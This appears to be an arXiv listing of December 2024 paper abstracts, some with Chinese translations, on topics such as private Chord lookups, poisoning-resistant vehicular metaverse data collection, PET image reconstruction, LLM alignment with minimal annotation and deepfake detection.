In structured peer-to-peer networks, like Chord, users find data by asking a number of intermediate nodes in the network. Each node provides the identity of the closest known node to the address of the data, until eventually the node responsible for the data is reached. This structure means that the intermediate nodes learn the address of the sought-after data. Revealing this information to other nodes makes Chord unsuitable for applications that require query privacy, so in this paper we present a scheme, Iris, that provides query privacy while maintaining compatibility with the existing Chord protocol. This means that anyone using it will be able to execute a privacy-preserving query, but it does not require other nodes in the network to use it (or even know about it). In order to better capture the privacy achieved by the iterative nature of the search, we propose a new privacy notion, inspired by $k$-anonymity. This new notion, called $(\alpha,\delta)$-privacy, allows us to formulate privacy guarantees against adversaries that collude and take advantage of the total amount of information leaked in all iterations of the search. We present a security analysis of the proposed algorithm based on the privacy notion we introduce. We also develop a prototype of the algorithm in Matlab and evaluate its performance. Our analysis proves Iris to be $(\alpha,\delta)$-private while introducing a modest performance overhead. Importantly, the overhead is tunable and proportional to the required level of privacy, so no privacy means no overhead.
Updated: 2024-12-05 17:09:25
Fields: cs.CR
VMGuard: Reputation-Based Incentive Mechanism for Poisoning Attack Detection in Vehicular Metaverse
The vehicular Metaverse represents an emerging paradigm that merges vehicular communications with virtual environments, integrating real-world data to enhance in-vehicle services. However, this integration faces critical security challenges, particularly in the data collection layer where malicious sensing IoT (SIoT) devices can compromise service quality through data poisoning attacks. The security aspects of the Metaverse services should be well addressed both when creating the digital twins of the physical systems and when delivering the virtual service to the vehicular Metaverse users (VMUs). This paper introduces vehicular Metaverse guard (VMGuard), a novel four-layer security framework that protects vehicular Metaverse systems from data poisoning attacks. Specifically, when the virtual service providers (VSPs) collect data about the physical environment through SIoT devices in the field, the delivered content might be tampered with. Malicious SIoT devices with moral hazard might have private incentives to provide poisoned data to the VSP to degrade the service quality (QoS) and user experience (QoE) of the VMUs. The proposed framework implements a reputation-based incentive mechanism that leverages user feedback and subjective logic modeling to assess the trustworthiness of participating SIoT devices. More precisely, the framework entails the use of reputation scores assigned to participating SIoT devices based on their historical engagements with the VSPs. Ultimately, we validate our proposed model using comprehensive simulations. Our key findings indicate that our mechanism effectively prevents the initiation of poisoning attacks by malicious SIoT devices. Additionally, our system ensures that reliable SIoT devices, previously misclassified, are not barred from participating in future rounds of the market.
Updated: 2024-12-05 17:08:20
Fields: cs.CR
Distributionally Robust Performative Prediction
Performative prediction aims to model scenarios where predictive outcomes subsequently influence the very systems they target. The pursuit of a performative optimum (PO) -- minimizing performative risk -- is generally reliant on modeling of the distribution map, which characterizes how a deployed ML model alters the data distribution. Unfortunately, inevitable misspecification of the distribution map can lead to a poor approximation of the true PO. To address this issue, we introduce a novel framework of distributionally robust performative prediction and study a new solution concept termed as distributionally robust performative optimum (DRPO). We show provable guarantees for DRPO as a robust approximation to the true PO when the nominal distribution map is different from the actual one. Moreover, distributionally robust performative prediction can be reformulated as an augmented performative prediction problem, enabling efficient optimization. The experimental results demonstrate that DRPO offers potential advantages over traditional PO approach when the distribution map is misspecified at either micro- or macro-level.
Updated: 2024-12-05 17:05:49
Fields: cs.LG,stat.ML
Limit Theorems for Stochastic Gradient Descent with Infinite Variance
Stochastic gradient descent is a classic algorithm that has gained great popularity, especially in the last decades, as the most common approach for training models in machine learning. While the algorithm has been well-studied when stochastic gradients are assumed to have a finite variance, there is significantly less research addressing its theoretical properties in the case of infinite-variance gradients. In this paper, we establish the asymptotic behavior of stochastic gradient descent in the context of infinite-variance stochastic gradients, assuming that the stochastic gradient is regularly varying with index $\alpha\in(1,2)$. The closest result in this context was established in 1969, in the one-dimensional case and assuming that stochastic gradients belong to a more restrictive class of distributions. We extend it to the multidimensional case, covering a broader class of infinite-variance distributions. As we show, the asymptotic distribution of the stochastic gradient descent algorithm can be characterized as the stationary distribution of a suitably defined Ornstein-Uhlenbeck process driven by an appropriate stable L\'evy process. Additionally, we explore the applications of these results in linear regression and logistic regression models.
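A toy simulation makes the setting tangible: run SGD on a one-dimensional quadratic with symmetric Pareto-tailed gradient noise of tail index alpha in (1, 2), which has finite mean but infinite variance. The quadratic objective and all constants are illustrative; the paper's analysis is far more general.

```python
import numpy as np

rng = np.random.default_rng(0)
alpha, lr, theta = 1.5, 1e-3, 5.0      # tail index in (1, 2): infinite variance

for _ in range(100_000):
    noise = rng.pareto(alpha) * rng.choice((-1.0, 1.0))  # symmetric heavy tail
    grad = theta + noise                # stochastic gradient of 0.5 * theta**2
    theta -= lr * grad

print(theta)  # hovers near 0, with occasional heavy-tailed excursions
```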
Updated: 2024-12-05 17:03:34
Fields: stat.ML,cs.LG,math.PR
RMD: A Simple Baseline for More General Human Motion Generation via Training-free Retrieval-Augmented Motion Diffuse
While motion generation has made substantial progress, its practical application remains constrained by dataset diversity and scale, limiting its ability to handle out-of-distribution scenarios. To address this, we propose a simple and effective baseline, RMD, which enhances the generalization of motion generation through retrieval-augmented techniques. Unlike previous retrieval-based methods, RMD requires no additional training and offers three key advantages: (1) the external retrieval database can be flexibly replaced; (2) body parts from the motion database can be reused, with an LLM facilitating splitting and recombination; and (3) a pre-trained motion diffusion model serves as a prior to improve the quality of motions obtained through retrieval and direct combination. Without any training, RMD achieves state-of-the-art performance, with notable advantages on out-of-distribution data.
Updated: 2024-12-05 17:01:09
Fields: cs.CV,cs.AI,cs.GR
Retrieval-Augmented Machine Translation with Unstructured Knowledge
Retrieval-augmented generation (RAG) introduces additional information to enhance large language models (LLMs). In machine translation (MT), previous work typically retrieves in-context examples from paired MT corpora, or domain-specific knowledge from knowledge graphs, to enhance models' MT ability. However, a large amount of world knowledge is organized in unstructured documents, and might not be fully paired across different languages. In this paper, we study retrieval-augmented MT using unstructured documents. Specifically, we build RAGtrans, the first benchmark to train and evaluate LLMs' retrieval-augmented MT ability. RAGtrans contains 79K MT samples collected via GPT-4o and human translators. Besides, documents from different languages are also provided to supply the knowledge to these samples. Based on RAGtrans, we further propose a multi-task training method to teach LLMs how to use information from multilingual documents during their translation. The method uses existing multilingual corpora to create auxiliary training objectives without additional labeling requirements. Extensive experiments show that the method improves LLMs by 1.58-3.09 BLEU and 1.00-2.03 COMET scores.
Updated: 2024-12-05 17:00:32
Fields: cs.CL,cs.AI
Likelihood-Scheduled Score-Based Generative Modeling for Fully 3D PET Image Reconstruction
Medical image reconstruction with pre-trained score-based generative models (SGMs) has advantages over other existing state-of-the-art deep-learned reconstruction methods, including improved resilience to different scanner setups and advanced image distribution modeling. SGM-based reconstruction has recently been applied to simulated positron emission tomography (PET) datasets, showing improved contrast recovery for out-of-distribution lesions relative to the state-of-the-art. However, existing methods for SGM-based reconstruction from PET data suffer from slow reconstruction, burdensome hyperparameter tuning and slice inconsistency effects (in 3D). In this work, we propose a practical methodology for fully 3D reconstruction that accelerates reconstruction and reduces the number of critical hyperparameters by matching the likelihood of an SGM's reverse diffusion process to a current iterate of the maximum-likelihood expectation maximization algorithm. Using the example of low-count reconstruction from simulated $[^{18}$F]DPA-714 datasets, we show our methodology can match or improve on the NRMSE and SSIM of existing state-of-the-art SGM-based PET reconstruction while reducing reconstruction time and the need for hyperparameter tuning. We evaluate our methodology against state-of-the-art supervised and conventional reconstruction algorithms. Finally, we demonstrate a first-ever implementation of SGM-based reconstruction for real 3D PET data, specifically $[^{18}$F]DPA-714 data, where we integrate perpendicular pre-trained SGMs to eliminate slice inconsistency issues.
Updated: 2024-12-05 16:58:45
Fields: physics.med-ph,cs.CV,cs.LG
Action Mapping for Reinforcement Learning in Continuous Environments with Constraints
Deep reinforcement learning (DRL) has had success across various domains, but applying it to environments with constraints remains challenging due to poor sample efficiency and slow convergence. Recent literature explored incorporating model knowledge to mitigate these problems, particularly through the use of models that assess the feasibility of proposed actions. However, integrating feasibility models efficiently into DRL pipelines in environments with continuous action spaces is non-trivial. We propose a novel DRL training strategy utilizing action mapping that leverages feasibility models to streamline the learning process. By decoupling the learning of feasible actions from policy optimization, action mapping allows DRL agents to focus on selecting the optimal action from a reduced feasible action set. We demonstrate through experiments that action mapping significantly improves training performance in constrained environments with continuous action spaces, especially with imperfect feasibility models.
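One simple realization of such a mapping, under assumptions about the feasibility model's interface (a callable `is_feasible` plus a candidate set), is to pass feasible proposals through unchanged and project infeasible ones onto the nearest feasible candidate; the paper's learned mapping is more sophisticated than this sketch.

```python
import numpy as np

def map_to_feasible(proposed, is_feasible, candidates):
    """Return the proposed continuous action if feasible, else its nearest
    feasible candidate. `is_feasible` stands in for the feasibility model."""
    if is_feasible(proposed):
        return proposed
    feasible = [a for a in candidates if is_feasible(a)]
    return min(feasible, key=lambda a: np.linalg.norm(np.asarray(a) - np.asarray(proposed)))
```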
Updated: 2024-12-05 16:42:45
Fields: cs.LG,cs.AI,cs.SY,eess.SY
Learning in Wilson-Cowan model for metapopulation
The Wilson-Cowan model for metapopulation, a Neural Mass Network Model, treats different subcortical regions of the brain as connected nodes, with connections representing various types of structural, functional, or effective neuronal connectivity between these regions. Each region comprises interacting populations of excitatory and inhibitory cells, consistent with the standard Wilson-Cowan model. By incorporating stable attractors into such a metapopulation model's dynamics, we transform it into a learning algorithm capable of achieving high image and text classification accuracy. We test it on MNIST and Fashion MNIST, in combination with convolutional neural networks, on CIFAR-10 and TF-FLOWERS, and, in combination with a transformer architecture (BERT), on IMDB, always showing high classification accuracy. These numerical evaluations illustrate that minimal modifications to the Wilson-Cowan model for metapopulation can reveal unique and previously unobserved dynamics.
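For reference, one Euler step of a standard Wilson-Cowan metapopulation looks as follows; the sigmoid transfer function and the coupling constants are textbook-style illustrations, not the paper's fitted values.

```python
import numpy as np

def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))

def wilson_cowan_step(E, I, W, dt=0.1, wee=16.0, wei=12.0, wie=15.0, wii=3.0, P=1.0, Q=0.0):
    """E, I: per-region excitatory/inhibitory activity vectors; W: coupling
    matrix between regions (structural/functional connectivity)."""
    inter = W @ E                                   # long-range excitatory input
    dE = -E + sigmoid(wee * E - wei * I + inter + P)
    dI = -I + sigmoid(wie * E - wii * I + Q)
    return E + dt * dE, I + dt * dI
```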
Updated: 2024-12-05 16:39:32
Fields: q-bio.NC,cond-mat.dis-nn,cond-mat.stat-mech,cs.AI,cs.NE
GRAM: Generalization in Deep RL with a Robust Adaptation Module
The reliable deployment of deep reinforcement learning in real-world settings requires the ability to generalize across a variety of conditions, including both in-distribution scenarios seen during training as well as novel out-of-distribution scenarios. In this work, we present a framework for dynamics generalization in deep reinforcement learning that unifies these two distinct types of generalization within a single architecture. We introduce a robust adaptation module that provides a mechanism for identifying and reacting to both in-distribution and out-of-distribution environment dynamics, along with a joint training pipeline that combines the goals of in-distribution adaptation and out-of-distribution robustness. Our algorithm GRAM achieves strong generalization performance across in-distribution and out-of-distribution scenarios upon deployment, which we demonstrate on a variety of realistic simulated locomotion tasks with a quadruped robot.
Updated: 2024-12-05 16:39:01
Fields: cs.LG,cs.AI,cs.RO,stat.ML
A Fisher-Rao gradient flow for entropy-regularised Markov decision processes in Polish spaces
We study the global convergence of a Fisher-Rao policy gradient flow for infinite-horizon entropy-regularised Markov decision processes with Polish state and action space. The flow is a continuous-time analogue of a policy mirror descent method. We establish the global well-posedness of the gradient flow and demonstrate its exponential convergence to the optimal policy. Moreover, we prove the flow is stable with respect to gradient evaluation, offering insights into the performance of a natural policy gradient flow with log-linear policy parameterisation. To overcome challenges stemming from the lack of the convexity of the objective function and the discontinuity arising from the entropy regulariser, we leverage the performance difference lemma and the duality relationship between the gradient and mirror descent flows. Our analysis provides a theoretical foundation for developing various discrete policy gradient algorithms.
Updated: 2024-12-05 16:35:46
Fields: math.OC,cs.LG,math.PR,90C40, 93E20, 90C26, 60B05, 90C53
Generative-Model-Based Fully 3D PET Image Reconstruction by Conditional Diffusion Sampling
Score-based generative models (SGMs) have recently shown promising results for image reconstruction on simulated positron emission tomography (PET) datasets. In this work we have developed and implemented practical methodology for 3D image reconstruction with SGMs, and perform (to our knowledge) the first SGM-based reconstruction of real fully 3D PET data. We train an SGM on full-count reference brain images, and extend methodology to allow SGM-based reconstructions at very low counts (1% of original, to simulate low-dose or short-duration scanning). We then perform reconstructions for multiple independent realisations of 1% count data, allowing us to analyse the bias and variance characteristics of the method. We sample from the learned posterior distribution of the generative algorithm to calculate uncertainty images for our reconstructions. We evaluate the method's performance on real full- and low-count PET data and compare with conventional OSEM and MAP-EM baselines, showing that our SGM-based low-count reconstructions match full-dose reconstructions more closely and in a bias-variance trade-off comparison, our SGM-reconstructed images have lower variance than existing baselines. Future work will compare to supervised deep-learned methods, with other avenues for investigation including how data conditioning affects the SGM's posterior distribution and the algorithm's performance with different tracers.
Updated: 2024-12-05 16:35:43
Fields: physics.med-ph,cs.CV,cs.LG
Enhancing Novel Object Detection via Cooperative Foundational Models
In this work, we address the challenging and emergent problem of novel object detection (NOD), focusing on the accurate detection of both known and novel object categories during inference. Traditional object detection algorithms are inherently closed-set, limiting their capability to handle NOD. We present a novel approach to transform existing closed-set detectors into open-set detectors. This transformation is achieved by leveraging the complementary strengths of pre-trained foundational models, specifically CLIP and SAM, through our cooperative mechanism. Furthermore, by integrating this mechanism with state-of-the-art open-set detectors such as GDINO, we establish new benchmarks in object detection performance. Our method achieves 17.42 mAP in novel object detection and 42.08 mAP for known objects on the challenging LVIS dataset. Adapting our approach to the COCO OVD split, we surpass the current state-of-the-art by a margin of 7.2 $\text{AP}_{50}$ for novel classes. Our code is available at https://rohit901.github.io/coop-foundation-models/.
Updated: 2024-12-05 16:34:21
Fields: cs.CV,cs.AI,cs.LG
The Hyperfitting Phenomenon: Sharpening and Stabilizing LLMs for Open-Ended Text Generation
This paper introduces the counter-intuitive generalization results of overfitting pre-trained large language models (LLMs) on very small datasets. In the setting of open-ended text generation, it is well-documented that LLMs tend to generate repetitive and dull sequences, a phenomenon that is especially apparent when generating using greedy decoding. This issue persists even with state-of-the-art LLMs containing billions of parameters, trained via next-token prediction on large datasets. We find that by further fine-tuning these models to achieve a near-zero training loss on a small set of samples -- a process we refer to as hyperfitting -- the long-sequence generative capabilities are greatly enhanced. Greedy decoding with these Hyperfitted models even outperform Top-P sampling over long-sequences, both in terms of diversity and human preferences. This phenomenon extends to LLMs of various sizes, different domains, and even autoregressive image generation. We further find this phenomena to be distinctly different from that of Grokking and double descent. Surprisingly, our experiments indicate that hyperfitted models rarely fall into repeating sequences they were trained on, and even explicitly blocking these sequences results in high-quality output. All hyperfitted models produce extremely low-entropy predictions, often allocating nearly all probability to a single token.
Updated: 2024-12-05 16:34:20
Fields: cs.CL,cs.AI
Densing Law of LLMs
Large Language Models (LLMs) have emerged as a milestone in artificial intelligence, and their performance can improve as the model size increases. However, this scaling brings great challenges to training and inference efficiency, particularly for deploying LLMs in resource-constrained environments, and the scaling trend is becoming increasingly unsustainable. This paper introduces the concept of "capacity density" as a new metric to evaluate the quality of LLMs across different scales and describes the trend of LLMs in terms of both effectiveness and efficiency. To calculate the capacity density of a given target LLM, we first introduce a set of reference models and develop a scaling law to predict the downstream performance of these reference models based on their parameter sizes. We then define the effective parameter size of the target LLM as the parameter size required by a reference model to achieve equivalent performance, and formalize the capacity density as the ratio of the effective parameter size to the actual parameter size of the target LLM. Capacity density provides a unified framework for assessing both model effectiveness and efficiency. Our further analysis of recent open-source base LLMs reveals an empirical law (the densing law) that the capacity density of LLMs grows exponentially over time. More specifically, using some widely used benchmarks for evaluation, the capacity density of LLMs doubles approximately every three months. The law provides new perspectives to guide future LLM development, emphasizing the importance of improving capacity density to achieve optimal results with minimal computational overhead.
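The definition can be expressed in a few lines once a reference scaling law is fitted. The power-law form below (and its numbers) is a hypothetical stand-in for the paper's fitted law, which predicts downstream performance rather than loss.

```python
def effective_params(loss, a, b):
    """Invert an assumed reference scaling law L(N) = a * N**(-b): the size a
    reference model would need to reach `loss`."""
    return (loss / a) ** (-1.0 / b)

def capacity_density(actual_params, loss, a, b):
    return effective_params(loss, a, b) / actual_params

# hypothetical fit: capacity_density(7e9, loss=2.1, a=406.4, b=0.34)
```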
Updated: 2024-12-05 16:31:13
Fields: cs.AI,cs.CL
The Tile: A 2D Map of Ranking Scores for Two-Class Classification
In the computer vision and machine learning communities, as well as in many other research domains, rigorous evaluation of any new method, including classifiers, is essential. One key component of the evaluation process is the ability to compare and rank methods. However, ranking classifiers and accurately comparing their performances, especially when taking application-specific preferences into account, remains challenging. For instance, commonly used evaluation tools like Receiver Operating Characteristic (ROC) and Precision/Recall (PR) spaces display performances based on two scores. Hence, they are inherently limited in their ability to compare classifiers across a broader range of scores and lack the capability to establish a clear ranking among classifiers. In this paper, we present a novel versatile tool, named the Tile, that organizes an infinity of ranking scores in a single 2D map for two-class classifiers, including common evaluation scores such as the accuracy, the true positive rate, the positive predictive value, Jaccard's coefficient, and all F-beta scores. Furthermore, we study the properties of the underlying ranking scores, such as the influence of the priors or the correspondences with the ROC space, and depict how to characterize any other score by comparing them to the Tile. Overall, we demonstrate that the Tile is a powerful tool that effectively captures all the rankings in a single visualization and allows interpreting them.
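To convey the "many scores at once" idea, the sketch below sweeps one family the Tile contains, the F-beta scores, across many betas from a single confusion matrix; the Tile's actual 2D parameterization is broader and is not reproduced here.

```python
import numpy as np

def fbeta_sweep(tp, fp, fn, betas=np.logspace(-1, 1, 51)):
    """F-beta for a whole grid of betas at once (one slice of a Tile-like map)."""
    precision = tp / (tp + fp)
    recall = tp / (tp + fn)
    b2 = betas ** 2
    return (1 + b2) * precision * recall / (b2 * precision + recall)
```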
Updated: 2024-12-05 16:27:59
Fields: cs.CV,cs.LG,cs.PF
ELEMENTAL: Interactive Learning from Demonstrations and Vision-Language Models for Reward Design in Robotics
Reinforcement learning (RL) has demonstrated compelling performance in robotic tasks, but its success often hinges on the design of complex, ad hoc reward functions. Researchers have explored how Large Language Models (LLMs) could enable non-expert users to specify reward functions more easily. However, LLMs struggle to balance the importance of different features, generalize poorly to out-of-distribution robotic tasks, and cannot represent the problem properly with only text-based descriptions. To address these challenges, we propose ELEMENTAL (intEractive LEarning froM dEmoNstraTion And Language), a novel framework that combines natural language guidance with visual user demonstrations to align robot behavior with user intentions better. By incorporating visual inputs, ELEMENTAL overcomes the limitations of text-only task specifications, while leveraging inverse reinforcement learning (IRL) to balance feature weights and match the demonstrated behaviors optimally. ELEMENTAL also introduces an iterative feedback-loop through self-reflection to improve feature, reward, and policy learning. Our experiment results demonstrate that ELEMENTAL outperforms prior work by 42.3% on task success, and achieves 41.3% better generalization in out-of-distribution tasks, highlighting its robustness in LfD.
Updated: 2024-12-05 16:27:08
标题: ELEMENTAL:基于演示与视觉-语言模型的交互式学习,用于机器人奖励设计
摘要: 强化学习(RL)在机器人任务中表现出令人信服的性能,但其成功往往取决于复杂、特定的奖励函数的设计。研究人员探索了如何利用大型语言模型(LLMs)使非专业用户更容易指定奖励函数。然而,LLMs很难平衡不同特征的重要性,在分布外的机器人任务中泛化能力差,且无法仅通过文本描述正确表示问题。为了解决这些挑战,我们提出了ELEMENTAL(intEractive LEarning froM dEmoNstraTion And Language),这是一个新颖的框架,结合自然语言引导和视觉用户演示,更好地使机器人行为与用户意图一致。通过整合视觉输入,ELEMENTAL克服了仅有文本任务规范的局限性,同时利用反向强化学习(IRL)来平衡特征权重,并最佳匹配展示的行为。ELEMENTAL还通过自我反思引入了迭代反馈循环,以改进特征、奖励和策略学习。我们的实验结果表明,ELEMENTAL在任务成功率上比先前工作提高了42.3%,在分布外任务中实现了41.3%更好的泛化能力,突显了其在LfD中的稳健性。
更新时间: 2024-12-05 16:27:08
领域: cs.RO,cs.LG
ALMA: Alignment with Minimal Annotation
Recent approaches to large language model (LLM) alignment typically require millions of human annotations or rely on external aligned models for synthetic data generation. This paper introduces ALMA: Alignment with Minimal Annotation, demonstrating that effective alignment can be achieved using only 9,000 labeled examples -- less than 1% of conventional approaches. ALMA generates large amounts of high-quality synthetic alignment data through new techniques: diverse prompt synthesis via few-shot learning, diverse response generation with multiple model checkpoints, and judge (reward model) enhancement through score aggregation and self-distillation. Using only a pretrained Llama3 base model, 5,000 SFT examples, and 4,000 judge annotations, ALMA achieves performance close to Llama3-Instruct across diverse alignment benchmarks (e.g., 0.1% difference on AlpacaEval 2.0 score). These results are achieved with a multi-round, self-bootstrapped data synthesis and training recipe that continues to improve for 10 rounds, surpassing the typical 3-round ceiling of previous methods. These results suggest that base models already possess sufficient knowledge for effective alignment, and that synthetic data generation methods can expose it.
Updated: 2024-12-05 16:26:31
标题: ALMA:最小标注对齐
摘要: 最近的大型语言模型(LLM)对齐方法通常需要数百万人工注释或依赖外部对齐模型来生成合成数据。本文介绍了ALMA:最小标注对齐,证明只需使用9,000个标记示例即可实现有效对齐,这比传统方法的1%还少。ALMA通过新技术生成大量高质量的合成对齐数据:通过少样本学习实现多样化提示合成,通过多个模型检查点生成多样化回应,通过分数聚合和自蒸馏增强评判(奖励模型)。只使用预训练的Llama3基础模型、5,000个SFT示例和4,000个评判注释,ALMA在各种对齐基准测试中实现了接近Llama3-Instruct的性能(例如,在AlpacaEval 2.0分数上相差0.1%)。这些结果是通过多轮、自引导的数据合成和训练配方实现的,持续改进10轮,超过了先前方法的典型3轮上限。这些结果表明基础模型已经具有足够的知识进行有效对齐,并且合成数据生成方法可以暴露出这些知识。
更新时间: 2024-12-05 16:26:31
领域: cs.CL,cs.LG
HydraViT: Stacking Heads for a Scalable ViT
The architecture of Vision Transformers (ViTs), particularly the Multi-head Attention (MHA) mechanism, imposes substantial hardware demands. Deploying ViTs on devices with varying constraints, such as mobile phones, requires multiple models of different sizes. However, this approach has limitations, such as training and storing each required model separately. This paper introduces HydraViT, a novel approach that addresses these limitations by stacking attention heads to achieve a scalable ViT. By repeatedly changing the size of the embedded dimensions throughout each layer and their corresponding number of attention heads in MHA during training, HydraViT induces multiple subnetworks. Thereby, HydraViT achieves adaptability across a wide spectrum of hardware environments while maintaining performance. Our experimental results demonstrate the efficacy of HydraViT in achieving a scalable ViT with up to 10 subnetworks, covering a wide range of resource constraints. HydraViT achieves up to 5 p.p. more accuracy with the same GMACs and up to 7 p.p. more accuracy with the same throughput on ImageNet-1K compared to the baselines, making it an effective solution for scenarios where hardware availability is diverse or varies over time. Source code available at https://github.com/ds-kiel/HydraViT.
Updated: 2024-12-05 16:24:15
标题: HydraViT:堆叠头部以实现可扩展的ViT
摘要: Vision Transformers(ViTs)的架构,尤其是多头注意力(MHA)机制,对硬件提出了很高的要求。在移动电话等具有不同约束的设备上部署ViTs,需要多个不同大小的模型。然而,这种方法有局限性,比如需要单独训练和存储每个所需的模型。本文介绍了HydraViT,这是一种通过堆叠注意力头来实现可扩展ViT、从而解决这些局限性的新颖方法。通过在训练过程中反复改变每一层嵌入维度的大小以及MHA中对应的注意力头数量,HydraViT诱导出多个子网络。因此,HydraViT在保持性能的同时实现了对各种硬件环境的适应性。我们的实验结果表明,HydraViT能够有效实现最多包含10个子网络的可扩展ViT,覆盖了广泛的资源约束范围。与基线相比,HydraViT在ImageNet-1K上在相同GMACs下准确率最多提高5个百分点,在相同吞吐量下最多提高7个百分点,这使其成为硬件可用性多样或随时间变化场景下的有效解决方案。源代码可在https://github.com/ds-kiel/HydraViT上找到。
更新时间: 2024-12-05 16:24:15
领域: cs.CV,cs.AI,cs.LG
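A minimal sketch of the subnetwork idea behind HydraViT (illustrative only, not the authors' code; the packed-QKV layout and the convention of keeping the leading dimensions are our assumptions): slicing the embedding dimensions, and the attention heads they correspond to, yields a smaller model from the same weights.

import torch

def slice_mha(full_qkv: torch.Tensor, d_full: int, d_sub: int) -> torch.Tensor:
    # full_qkv: (3 * d_full, d_full) packed query/key/value projection.
    q, k, v = full_qkv.split(d_full, dim=0)
    parts = [w[:d_sub, :d_sub] for w in (q, k, v)]   # keep leading dims/heads
    return torch.cat(parts, dim=0)                   # (3 * d_sub, d_sub)

w = torch.randn(3 * 768, 768)          # e.g. a ViT-Base sized projection
print(slice_mha(w, 768, 384).shape)    # torch.Size([1152, 384])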
T2I-FactualBench: Benchmarking the Factuality of Text-to-Image Models with Knowledge-Intensive Concepts
Evaluating the quality of synthesized images remains a significant challenge in the development of text-to-image (T2I) generation. Most existing studies in this area primarily focus on evaluating text-image alignment, image quality, and object composition capabilities, with comparatively fewer studies addressing the evaluation of the factuality of T2I models, particularly when the concepts involved are knowledge-intensive. To mitigate this gap, we present T2I-FactualBench in this work - the largest benchmark to date in terms of the number of concepts and prompts specifically designed to evaluate the factuality of knowledge-intensive concept generation. T2I-FactualBench consists of a three-tiered knowledge-intensive text-to-image generation framework, ranging from the basic memorization of individual knowledge concepts to the more complex composition of multiple knowledge concepts. We further introduce a multi-round visual question answering (VQA) based evaluation framework to assess the factuality of three-tiered knowledge-intensive text-to-image generation tasks. Experiments on T2I-FactualBench indicate that current state-of-the-art (SOTA) T2I models still leave significant room for improvement.
Updated: 2024-12-05 16:21:01
标题: T2I-FactualBench:使用知识密集型概念对文本到图像模型的事实性进行基准测试
摘要: 评估合成图像的质量仍然是文本到图像(T2I)生成领域中的一个重要挑战。目前大部分研究主要集中在评估文本-图像对齐、图像质量和物体组合能力,相比之下,更少的研究涉及T2I模型的事实性评估,特别是涉及知识密集型概念时。为了填补这一空白,我们在这项工作中提出了T2I-FactualBench——迄今为止概念数量和提示数量最多的基准测试,专门设计用于评估知识密集型概念生成的事实性。T2I-FactualBench包括一个三层知识密集型文本到图像生成框架,从单个知识概念的基本记忆到多个知识概念的复杂组合。我们进一步介绍了一个基于多轮视觉问答(VQA)的评估框架,用于评估三层知识密集型文本到图像生成任务的事实性。对T2I-FactualBench的实验表明,当前的最新技术(SOTA)T2I模型仍然有很大的改进空间。
更新时间: 2024-12-05 16:21:01
领域: cs.CV,cs.AI
Structure-Aware Stylized Image Synthesis for Robust Medical Image Segmentation
Accurate medical image segmentation is essential for effective diagnosis and treatment planning but is often challenged by domain shifts caused by variations in imaging devices, acquisition conditions, and patient-specific attributes. Traditional domain generalization methods typically require inclusion of parts of the test domain within the training set, which is not always feasible in clinical settings with limited diverse data. Additionally, although diffusion models have demonstrated strong capabilities in image generation and style transfer, they often fail to preserve the critical structural information necessary for precise medical analysis. To address these issues, we propose a novel medical image segmentation method that combines diffusion models and Structure-Preserving Network for structure-aware one-shot image stylization. Our approach effectively mitigates domain shifts by transforming images from various sources into a consistent style while maintaining the location, size, and shape of lesions. This ensures robust and accurate segmentation even when the target domain is absent from the training data. Experimental evaluations on colonoscopy polyp segmentation and skin lesion segmentation datasets show that our method enhances the robustness and accuracy of segmentation models, achieving superior performance metrics compared to baseline models without style transfer. This structure-aware stylization framework offers a practical solution for improving medical image segmentation across diverse domains, facilitating more reliable clinical diagnoses.
Updated: 2024-12-05 16:15:32
标题: 结构感知风格化图像合成用于鲁棒的医学图像分割
摘要: 精确的医学图像分割对于有效的诊断和治疗规划至关重要,但常常受到由成像设备、采集条件和患者特定属性差异引起的域偏移的挑战。传统的域泛化方法通常需要在训练集中包含部分测试域的数据,而在多样化数据有限的临床环境中这并非总是可行。此外,虽然扩散模型在图像生成和风格迁移方面表现出强大能力,但它们经常无法保留精确医学分析所必需的关键结构信息。为了解决这些问题,我们提出了一种结合扩散模型和结构保持网络(Structure-Preserving Network)的新型医学图像分割方法,用于结构感知的单样本图像风格化。我们的方法通过将来自各种来源的图像转换为一致的风格,同时保持病变的位置、大小和形状,有效缓解了域偏移。这确保了即使目标域不在训练数据中,也能实现稳健且准确的分割。在结肠镜息肉分割和皮肤病变分割数据集上的实验评估表明,我们的方法增强了分割模型的鲁棒性和准确性,相较于没有风格迁移的基线模型取得了更优越的性能指标。这种结构感知的风格化框架为改善跨不同域的医学图像分割提供了实用的解决方案,有助于更可靠的临床诊断。
更新时间: 2024-12-05 16:15:32
领域: eess.IV,cs.CV,cs.LG
SIDA: Social Media Image Deepfake Detection, Localization and Explanation with Large Multimodal Model
The rapid advancement of generative models in creating highly realistic images poses substantial risks for misinformation dissemination. For instance, a synthetic image, when shared on social media, can mislead extensive audiences and erode trust in digital content, resulting in severe repercussions. Despite some progress, academia has not yet created a large and diversified deepfake detection dataset for social media, nor has it devised an effective solution to address this issue. In this paper, we introduce the Social media Image Detection dataSet (SID-Set), which offers three key advantages: (1) extensive volume, featuring 300K AI-generated/tampered and authentic images with comprehensive annotations, (2) broad diversity, encompassing fully synthetic and tampered images across various classes, and (3) elevated realism, with images that are predominantly indistinguishable from genuine ones through mere visual inspection. Furthermore, leveraging the exceptional capabilities of large multimodal models, we propose a new image deepfake detection, localization, and explanation framework, named SIDA (Social media Image Detection, localization, and explanation Assistant). SIDA not only discerns the authenticity of images, but also delineates tampered regions through mask prediction and provides textual explanations of the model's judgment criteria. Compared with state-of-the-art deepfake detection models on SID-Set and other benchmarks, extensive experiments demonstrate that SIDA achieves superior performance among diversified settings. The code, model, and dataset will be released.
Updated: 2024-12-05 16:12:25
标题: SIDA:利用大型多模态模型进行社交媒体图像深度伪造检测、定位和解释
摘要: 生成模型在创建高度逼真图像方面的快速进展给虚假信息传播带来了重大风险。例如,一张合成图像在社交媒体上被分享时,可能会误导广大受众,破坏对数字内容的信任,造成严重后果。尽管取得了一些进展,学术界尚未为社交媒体创建一个大规模且多样化的深度伪造检测数据集,也未设计出有效的解决方案来应对这一问题。在本文中,我们介绍了社交媒体图像检测数据集(SID-Set),它具有三个关键优势:(1)规模庞大,包括30万张带有全面标注的AI生成/篡改图像和真实图像;(2)多样性广,涵盖各种类别的完全合成图像和篡改图像;(3)高度逼真,绝大多数图像仅凭视觉检查难以与真实图像区分。此外,利用大型多模态模型的卓越能力,我们提出了一种新的图像深度伪造检测、定位和解释框架,名为SIDA(社交媒体图像检测、定位和解释助手)。SIDA不仅可以判别图像的真实性,还可以通过掩模预测标示篡改区域,并为模型的判断依据提供文本解释。与SID-Set和其他基准上最先进的深度伪造检测模型相比,大量实验表明,SIDA在多样化设置中实现了更优的性能。代码、模型和数据集将会发布。
